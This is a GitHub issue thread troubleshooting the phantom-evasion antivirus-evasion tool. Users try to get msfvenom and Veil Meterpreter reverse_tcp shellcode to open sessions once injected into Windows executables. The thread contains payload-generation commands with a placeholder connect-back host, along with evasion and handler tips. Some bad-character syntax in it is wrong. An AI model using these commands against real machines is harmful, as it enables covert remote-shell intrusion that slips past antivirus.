Shellcode not working about phantom-evasion HOT 35 CLOSED

Of course

from phantom-evasion.

@oddcod3 Works! the wrong badchars were the problem. Thanks for the help!

from phantom-evasion.

64 bit payloads are more efficient (1/66) as mentioned in the README.
For example use windows/x64/meterpreter/reverse_tcp as msfvenom payload with one of the Windows shellcode injection modules.

from phantom-evasion.

Only problem is that I couldn't get shellcode injection to work even on 32bit.
I generated win shellcode with
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c > outfile
which gave me a file like

#some notes
"\xfc\x8d\....\k6s"
"\j2c\x20\...\x00";

and I merged all together and pasted all in one line like \xfc\x8d\k6s\j2c\x20\x00

Was that correct or is there my mistake?

from phantom-evasion.

Your shellcode contains badchars (like \x00 (string terminator in c),\x0a and \x0d).
To avoid the problem add to your msfvenom command: -b "/x00/x0a/x0b"
Or use directly the option msfvenom payload in phantom evasion which automatically remove badchars from shellcode.

from phantom-evasion.

As described in this issue, I can't use the option msfvenom payload in phantom evasion, because you can't add other options besides lhost/lport like PrependMigrate

but I will try the shellcode method again

from phantom-evasion.

I have no luck.
No shellcode worked, the default meterpreter only worked partly.
The default meterpreter sends the initializer stage, but exits afterwards

from phantom-evasion.

Did you set payload option in multi/handler correctly?
If you use 64 bit payload the listener must be aware of what kind of stages will have to send once a connection has been established(x86 or x64 meterpreter stages).

from phantom-evasion.

It looks like you've used windows/x64/meterpreter/reverse_tcp as payload but on multi/handler you've set payload windows/meterpreter/reverse_tcp.

from phantom-evasion.

No I've used the 32bit payload on both listener and sender.

The only time I ran in this same error was when I was testing the reverse_http payload with proxy, but besides that it ether worked or didn't work at all

But I think with a lot of testing I can figure this one out myself

My main problem is a different one. It's how to use Metersploit as Shellcode. When created and implemented like in my comments above, even with AV turned off, it just doesn't create the connection
Has anyone even tested it with own shellcode from msfvenom?

from phantom-evasion.

Could you paste here your msfvenom command used to generate the shellcode?
(Without lhost and lport information)

from phantom-evasion.

Already posted it above but here again:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0b" > outfile

from phantom-evasion.

@anonymouz4 same problem

from phantom-evasion.

Any updates on this?

from phantom-evasion.

@oddcod3 I used custom shellcode generated by veil and couldn't get any session back to meterpreter.Could you please check it?

from phantom-evasion.

@anonymouz4 i've made a mistake: not /x0b but /x0d

from phantom-evasion.

@oddcod3 I didn't use badchars while generating shellcode with veil.The badchars that I avoided were \x00\x0a\x0d

from phantom-evasion.

@oddcod3 Ok I will try this with /x0d and then get back to you

from phantom-evasion.

I'm testing now if i can reproduce the issue.
At the moment i've tested custom msfvenom x86 shellcode with compiling option x86 and i can establish a session without problem.
Are you all (@usama7628674 @anonymouz4 @onesentinel) aware that using an x86 shellcode require to compile the executable for x86 architecture?

from phantom-evasion.

@oddcod3 Here's how can you reproduce the issue
clone and install veil from github
use ordnance
select payload rev_tcp
set badchars \x00\x0a\x0d
set other options lhost,lport
generate
Then copy and paste the shellcode in phantom-evasion
select architecture x64.
run the generated .exe in windows 10 v1803

from phantom-evasion.

@usama7628674 Are you sure payload rev_tcp isn't 32bit?

from phantom-evasion.

@anonymouz4 Thats what I don't know.I'll ask from veil developer

from phantom-evasion.

@usama7628674 I'm almost sure that that is the case here. Just use msfvenom to create the shell code

from phantom-evasion.

@anonymouz4 Maybe veil is generating 32 bit shellcode while I'm using x64 arch in phantom-evasion will try x86 arch and see if it works or not

from phantom-evasion.

Yes ,as @anonymouz4 said veil payloads are 32 bit, @usama7628674 with x86 compiling option you'll see a session correctly established!

from phantom-evasion.

@anonymouz4 finally!! (I'm sorry for the typo!)

from phantom-evasion.

@oddcod3 Yeah I'm pretty sure now veil generates 32 bit shellcode

from phantom-evasion.

@oddcod3
I think I celebrated a little too early. It creates the connection but instantly dies

And this time I'm 100% sure everything is on 32bit

from phantom-evasion.

@anonymouz4 try with veil and see it you sustain connection permanently

from phantom-evasion.

@usama7628674 Maybe, but I'll need to invest a lot of time bc Veil isn't working yet for me. Everytime I run the script it just says installing and finishes that with success. So I probably have to do all manually

from phantom-evasion.

@anonymouz4 You must install it using git clone method

from phantom-evasion.

@usama7628674 I did

from phantom-evasion.

@anonymouz4 What did you get after executing?

from phantom-evasion.

Has anyone achieved a working connection with 64bit shellcode?

My summary:
Veil:
Only supports 32bit shellcode (not testet, but prob. works)
msfvenom:
32bit connects but instantly dies. 64bit doesn't work at all

from phantom-evasion.

I will open a new issue, close this one to create an overview on this topic, bc everything here is a little unclear
Just like a fresh Start

from phantom-evasion.